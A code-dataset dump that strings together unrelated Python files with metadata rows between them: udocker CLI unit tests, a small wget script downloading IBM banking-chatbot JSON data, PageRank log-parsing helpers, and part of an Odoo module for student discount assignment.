udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.protect_container.called)
self.assertFalse(self.local.protect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
self.local.protect_imagerepo.return_value = True
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.protect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.protect_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(self.local.protect_container.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.protect_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_29_do_unprotect(self, mock_chkimg, mock_msg):
"""Test29 UdockerCLI().do_unprotect()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "protect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.unprotect_container.called)
self.assertFalse(self.local.unprotect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
self.local.unprotect_imagerepo.return_value = True
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.unprotect_imagerepo.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.unprotect_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(self.local.unprotect_container.called)
argv = ["udocker", "protect", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.unprotect_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_unprotect(cmdp)
self.assertEqual(status, 1)
@patch('udocker.cli.Msg')
def test_30_do_name(self, mock_msg):
"""Test30 UdockerCLI().do_name()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "name"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "name", "12345", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.set_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.called)
argv = ["udocker", "name", "12345", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = True
self.local.set_container_name.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_name(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
def test_31_do_rename(self, mock_msg):
"""Test31 UdockerCLI().do_rename()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["", ""]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.call_count, 1)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", "543"]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.call_count, 2)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container_name.called)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = True
self.local.set_container_name.side_effect = [False, True]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.call_count, 2)
argv = ["udocker", "rename", "contname", "newname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.side_effect = ["123", ""]
self.local.del_container_name.return_value = True
self.local.set_container_name.side_effect = [True, True]
udoc = UdockerCLI(self.local)
status = udoc.do_rename(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.set_container_name.call_count, 1)
@patch('udocker.cli.Msg')
def test_32_do_rmname(self, mock_msg):
"""Test32 UdockerCLI().do_rmname()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rmname"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.del_container_name.called)
argv = ["udocker", "rmname", "contname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.del_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container_name.called)
argv = ["udocker", "rmname", "contname"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.del_container_name.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmname(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.del_container_name.called)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.json.dumps')
@patch('udocker.cli.ContainerStructure.get_container_attr')
@patch('udocker.cli.Msg')
def test_33_do_inspect(self, mock_msg, mock_csattr, mock_jdump,
mock_chkimg):
"""Test33 UdockerCLI().do_inspect()."""
cont_insp = \
{
"architecture": "amd64",
"config": {
"AttachStderr": False,
"AttachStdin": False,
"AttachStdout": False,
"Cmd": [
"/bin/bash"
],
"Domainname": "",
"Entrypoint": None,
"Env": [
"PATH=/usr/local/sbin"
],
"Hostname": "",
"Image": "sha256:05725a",
"Labels": {
"org.opencontainers.image.vendor": "CentOS"
},
"WorkingDir": ""
},
"container": "c171c",
"container_config": {
"ArgsEscaped": True,
"Cmd": ["/bin/sh", "-c"],
"Domainname": "",
"Env": [
"PATH=/usr/local/sbin"
],
"Hostname": "c171c5a1528a",
"Image": "sha256:05725a",
"Labels": {
"org.label-schema.license": "GPLv2",
"org.label-schema.name": "CentOS Base Image",
"org.opencontainers.image.vendor": "CentOS"
},
"WorkingDir": ""
},
"created": "2020-05-05T21",
"docker_version": "18.09.7",
"id": "e72c1",
"os": "linux",
"parent": "61dc7"
}
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "inspect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_chkimg.return_value = ("", "latest")
self.local.cd_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "inspect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.get_image_attributes.return_value = (cont_insp, "")
mock_jdump.return_value = cont_insp
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 0)
argv = ["udocker", "inspect", "-p", "123"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "123"
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.get_image_attributes.return_value = (cont_insp, "")
mock_csattr.return_value = ("/ROOT/cont", cont_insp)
mock_jdump.return_value = cont_insp
udoc = UdockerCLI(self.local)
status = udoc.do_inspect(cmdp)
self.assertEqual(status, 0)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.Msg')
def test_34_do_verify(self, mock_msg, mock_chkimg):
"""Test34 UdockerCLI().do_verify()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "verify", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "verify", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
self.local.verify_image.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_verify(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.ExecutionMode')
@patch('udocker.cli.NvidiaMode')
@patch('udocker.cli.FileUtil.rchmod')
@patch('udocker.cli.Unshare.namespace_exec')
@patch('udocker.cli.MountPoint')
@patch('udocker.cli.FileBind')
@patch('udocker.cli.Msg')
def test_35_do_setup(self, mock_msg, mock_fb, mock_mp,
mock_unshr, mock_furchmod, mock_nv, mock_execm):
"""Test35 UdockerCLI().do_setup()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "setup"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.cd_container.called)
argv = ["udocker", "setup", "--execmode=P2", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_container.called)
argv = ["udocker", "setup", "--execmode=P2",
"--purge", "--fixperm", "--nvidia", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
mock_msg.level = 0
mock_fb.return_value.restore.return_value = None
mock_mp.return_value.restore.return_value = None
mock_unshr.return_value = None
mock_furchmod.return_value = None
mock_nv.return_value.set_mode.return_value = None
mock_execm.return_value.set_mode.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_fb.return_value.restore.called)
self.assertTrue(mock_mp.return_value.restore.called)
self.assertTrue(mock_unshr.called)
self.assertTrue(mock_furchmod.called)
self.assertTrue(mock_nv.return_value.set_mode.called)
self.assertTrue(mock_execm.return_value.set_mode.called)
argv = ["udocker", "setup", "--execmode=P2",
"--purge", "--fixperm", "--nvidia", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
mock_msg.level = 0
mock_fb.return_value.restore.return_value = None
mock_mp.return_value.restore.return_value = None
mock_unshr.return_value = None
mock_furchmod.return_value = None
mock_nv.return_value.set_mode.return_value = None
mock_execm.return_value.set_mode.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "setup", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.cd_container.return_value = "/ROOT/cont1"
self.local.isprotected_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_setup(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.UdockerTools')
@patch('udocker.cli.Msg')
def test_36_do_install(self, mock_msg, mock_utools):
"""Test36 UdockerCLI().do_install()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "install", "--force", "--purge"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_utools.return_value.purge.return_value = None
mock_utools.return_value.install.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "install", "--force", "--purge"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_utools.return_value.purge.return_value = None
mock_utools.return_value.install.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_install(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
def test_37_do_showconf(self, mock_msg):
"""Test37 UdockerCLI().do_showconf()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_showconf(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_msg.return_value.out.called)
argv = ["udocker", "showconf"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_showconf(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
@patch('udocker.cli.Msg')
def test_38_do_version(self, mock_msg):
"""Test38 UdockerCLI().do_version()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_version(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_msg.return_value.out.called)
argv = ["udocker", "version"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_version(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
@patch('udocker.cli.Msg')
def test_39_do_help(self, mock_msg):
"""Test39 UdockerCLI().do_help()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_help(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_msg.return_value.out.called)
if __name__ == '__main__':
main()
| 37.673575
| 78
| 0.605006
| 6,537
| 58,168
| 5.189689
| 0.063179
| 0.072424
| 0.071688
| 0.085424
| 0.841002
| 0.811997
| 0.784967
| 0.761916
| 0.732763
| 0.709742
| 0
| 0.012553
| 0.265919
| 58,168
| 1,543
| 79
| 37.697991
| 0.781944
| 0.043031
| 0
| 0.773854
| 0
| 0
| 0.102642
| 0.026603
| 0
| 0
| 0
| 0
| 0.190834
| 1
| 0.02855
| false
| 0.002254
| 0.013524
| 0
| 0.042825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bafc9ec68419712b433153d458d6848e4f33991
| 376
|
py
|
Python
|
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
dataset/download_datset.py
|
HrishikV/Ineuron_bankbot_internship
|
eb044d0047e2ad3cb6c9e69476e23bab7f6074be
|
[
"MIT"
] | null | null | null |
import wget
urls=["https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/full_banking.json","https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/banking_US.json","https://github.com/IBM/watson-banking-chatbot/blob/master/data/conversation/workspaces/banking_IN.json"]
for url in urls:
wget.download(url)
| 75.2
| 323
| 0.808511
| 55
| 376
| 5.472727
| 0.4
| 0.109635
| 0.139535
| 0.169435
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0.800664
| 0
| 0
| 0.031915
| 376
| 4
| 324
| 94
| 0.826923
| 0
| 0
| 0
| 0
| 0.75
| 0.819149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
32fed326af77f36144008b6d3f9ec24de1e6c69a
| 2,060
|
py
|
Python
|
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
scripts/helpers.py
|
nicktheway/Pagerank
|
ff57072deabca020548cd7fcc9f3c5a857f438ed
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
def loadParallelLogData(log_file):
with open(log_file, "r") as f:
logLines = f.readlines()
iterationTimes = []
errorProgression = []
i = 0
for line in logLines:
a = line.split()
if i == 0:
dataPath = a[1]
elif i == 1:
loadToCrsTime = a[4]
elif i == 2:
colorGroups = a[2]
elif i == 3:
colorTime = a[6]
elif i == 5:
makeStochasticTime = a[4]
if a[0] == "Iteration:":
iterationTimes.append(a[1])
errorProgression.append(a[5])
i += 1
loadToCrsTime = float(loadToCrsTime)
makeStochasticTime = float(makeStochasticTime)
colorTime = float(colorTime)
colorGroups = int(colorGroups)
iterationTimes = np.asarray(list(map(float, iterationTimes)))
errorProgression = np.asarray(list(map(float, errorProgression)))
dataPath = os.path.basename(dataPath)
dataPath = os.path.splitext(dataPath)[0]
return dataPath, loadToCrsTime, makeStochasticTime, colorTime, colorGroups, iterationTimes, errorProgression
def loadSerialLogData(log_file):
with open(log_file, "r") as f:
logLines = f.readlines()
iterationTimes = []
errorProgression = []
i = 0
for line in logLines:
a = line.split()
if i == 0:
dataPath = a[1]
elif i == 1:
loadToCrsTime = a[4]
elif i == 3:
makeStochasticTime = a[4]
if a[0] == "Iteration:":
iterationTimes.append(a[1])
errorProgression.append(a[5])
i += 1
loadToCrsTime = float(loadToCrsTime)
makeStochasticTime = float(makeStochasticTime)
iterationTimes = np.asarray(list(map(float, iterationTimes)))
errorProgression = np.asarray(list(map(float, errorProgression)))
dataPath = os.path.basename(dataPath)
dataPath = os.path.splitext(dataPath)[0]
return dataPath, loadToCrsTime, makeStochasticTime, iterationTimes, errorProgression
| 29.855072
| 112
| 0.603398
| 214
| 2,060
| 5.78972
| 0.228972
| 0.145278
| 0.048426
| 0.051655
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.019061
| 0.286893
| 2,060
| 69
| 113
| 29.855072
| 0.82437
| 0
| 0
| 0.793103
| 0
| 0
| 0.010674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.034483
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fd28a4fb788654663de19ce47d0ff089a0fa475a
| 31,947
|
py
|
Python
|
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_escuela/asignacion_descuento.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
class DescuentoAlumonsEscuelaDetalle(models.TransientModel):
_name="descuento.alumno.detalle"
_order = "jornada_id,seccion_id,curso_id,paralelo_id"
descuento_id =fields.Many2one('descuento.alumno',string="Relacion")
jornada_id=fields.Many2one('jornada','Jornada',copy=False, index=True)
seccion_id=fields.Many2one('seccion','Sección',copy=False, index=True)
curso_id=fields.Many2one('curso','Curso',copy=False, index=True)
paralelo_id=fields.Many2one('paralelo','Paralelo',copy=False, index=True)
alumno_id=fields.Many2one('res.partner',string="Alumno")
alumno_nombre = fields.Char(related='alumno_id.name',string="Alumno")
representante_id=fields.Many2one('res.partner',string="Representante")
colaborador = fields.Many2one('tipo.colaborador',string="Colaborador")
cant_representados = fields.Integer(string="# de Representados")
descuentos_ids = fields.Many2many('descuentos',string='Descuentos')
aplicar =fields.Boolean(string="Aplicar")
class DescuentoAlumonsEscuela(models.TransientModel):
_name="descuento.alumno"
_rec_name = 'descuento_id'
jornada_id=fields.Many2one('jornada','Jornada',copy=False, index=True)
seccion_id=fields.Many2one('seccion','Sección',copy=False, index=True)
curso_id=fields.Many2one('curso','Curso',copy=False, index=True)
paralelo_id=fields.Many2one('paralelo','Paralelo',copy=False, index=True)
colaborador = fields.Many2one('tipo.colaborador',string="Colaborador")
descuento_id = fields.Many2one('descuentos',string="Descuento")
porcentaje = fields.Float(related='descuento_id.porcentaje',string="Porcentaje")
alumno_id=fields.Many2one('res.partner',string="Alumno",domain="[('tipo','=','H'),('parent_id','=',representante_id)]")
representante_id=fields.Many2one('res.partner',string="Representante")
num_representados = fields.Integer(string="# de Representados")
descuento_line=fields.One2many('descuento.alumno.detalle','descuento_id',string="Relacion")
consulto=fields.Boolean(string="Consulta")
alumno_ids = fields.Many2one(related='alumno_id',string="Alumno",domain="[('tipo','=','H')]")
@api.multi
def consultar_alumnos(self):
self.env.cr.execute("""delete from descuento_alumno_detalle""")
if self.jornada_id:
if self.seccion_id:
if self.curso_id:
if self.paralelo_id:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
